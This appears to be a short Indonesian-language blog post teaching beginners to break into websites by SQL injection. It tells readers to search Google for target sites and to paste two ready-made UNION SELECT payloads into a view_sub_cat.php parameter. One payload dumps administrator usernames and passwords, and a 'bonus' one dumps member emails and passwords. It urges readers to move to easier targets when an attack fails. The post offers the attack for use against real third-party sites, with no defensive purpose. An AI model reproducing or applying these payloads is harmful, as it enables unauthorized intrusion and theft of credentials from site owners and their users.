Kita akan menggunakan yang paling sederhana dulu dari sekian cara, yang ane mau share disini adalah dengan SQL Injection jika sobat-sobat funtasticer sudah tau dengan yang satu ini acuhkan saja okrey, yu kita meluncur saja:
pertama cari target di google
target http://www.alamatsitustarget.com/index.php
sekarang index.php di hapus saja dan di ganti dng exploit nya di bawah ini (ini buat ngeinjeksi admin+paswordnya) copy semua yang bertanda merahnya jangan sampai terlewatkan okrey,.
----------------------------------------------------------------------------------------------------------
view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,admin_user,0x3a,admin_password,0x3C62723E),4/**/FROM/**/admin_users/*
---------------------------------------------------------------------------------------------------------setelah index.phpnya di ganti di paste&go aja langsung sob jika tidak tembus berarti websitenya pake pengaman peginjeksian, coba aja cari target yang lebih-lebih gampang asal satu syarat punya ane jangan di injeksi ya sob entar malah yang ente ane acak-acak,,he he
dan ini saya kasih bonus expolitnya buat membobol membernya serta+paswordnya, copy semua di bawah ini yang bertanda merahnya okrey,.
--------------------------------------------------------------------------------------------------------
view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,member_email,0x3a,member_password,0x3C62723E),4/**/FROM/**/members/*
---------------------------------------------------------------------------------------------------------jika sobat gagal satu kali dua kali itu wajar-wajar saja karena mempelajari sesuatu itu tidak ada yang langsung bisa,,okrey yu babay yu marie..
0 comments:
Post a Comment